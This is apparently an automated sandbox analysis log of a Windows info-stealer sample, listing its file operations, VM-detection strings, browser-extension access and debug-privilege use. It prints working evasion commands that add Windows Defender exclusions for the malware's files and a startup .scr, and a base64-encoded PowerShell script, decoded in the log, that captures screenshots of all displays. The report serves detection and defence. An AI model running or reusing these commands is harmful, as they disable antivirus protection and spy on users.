                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644879280 FindFirstFileExW,FindClose,0_2_00007FF644879280
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF6448783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6448783C0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644891874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF644891874
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644879280 FindFirstFileExW,FindClose,1_2_00007FF644879280
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF644891874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF644891874
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF6448783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6448783C0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0B46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,84_2_00007FF71F0B46EC
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0F88E0 FindFirstFileExA,84_2_00007FF71F0F88E0
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0AE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,84_2_00007FF71F0AE21C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAEE11E0 GetSystemInfo,1_2_00007FFDFAEE11E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\word.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior
                      Source: getmac.exe, 00000039.00000003.1911149956.0000023699F51000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000002.1916643490.0000023699F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                      Source: getmac.exe, 00000039.00000003.1911149956.0000023699F51000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000002.1916643490.0000023699F7C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1910354917.0000023699F79000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
                      Source: svchost.exe, 00000020.00000002.3494931048.000002224EE5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.3493709445.000002224982B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1911149956.0000023699F51000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000002.1916643490.0000023699F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fecodevmware
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f8vmusrvc
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d2qemu-ga
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                      Source: sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACB6F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1920331178.00000281AC04F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fecodevmsrvc
                      Source: bound.exe, 0000000F.00000002.4232992924.000000001B17E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: getmac.exe, 00000039.00000002.1916643490.0000023699F7C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1910354917.0000023699F79000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport7
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: getmac.exe, 00000039.00000003.1911149956.0000023699F51000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000002.1916643490.0000023699F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWx
                      Source: rar.exe, 00000054.00000002.2054225023.0000019522C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                      Source: getmac.exe, 00000039.00000003.1911149956.0000023699F51000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000002.1916643490.0000023699F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage",
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                      Source: getmac.exe, 00000039.00000002.1916643490.0000023699F7C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1910354917.0000023699F79000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000039.00000003.1909443777.0000023699F3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABE6E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABE6A000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABE6E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABE6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWket %SystemRoot%\system32\mswsock.dllo the same
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                      Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64488A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF64488A614
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDFAE9F160 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAE9F160
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644893480 GetProcessHeap,0_2_00007FF644893480
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\word.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\word.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\word.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\word.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\word.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64488A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF64488A614
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64487D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF64487D12C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64487C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF64487C8A0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64487D30C SetUnhandledExceptionFilter,0_2_00007FF64487D30C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF64488A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF64488A614
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF64487D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF64487D12C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF64487C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF64487C8A0
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FF64487D30C SetUnhandledExceptionFilter,1_2_00007FF64487D30C
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 1_2_00007FFDF8553028 IsProcessorFeaturePresent,00007FFE148D1730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE148D1730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDF8553028
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0F4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,84_2_00007FF71F0F4C10
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0EA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,84_2_00007FF71F0EA66C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0EB6D8 SetUnhandledExceptionFilter,84_2_00007FF71F0EB6D8
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0EB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,84_2_00007FF71F0EB52C
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
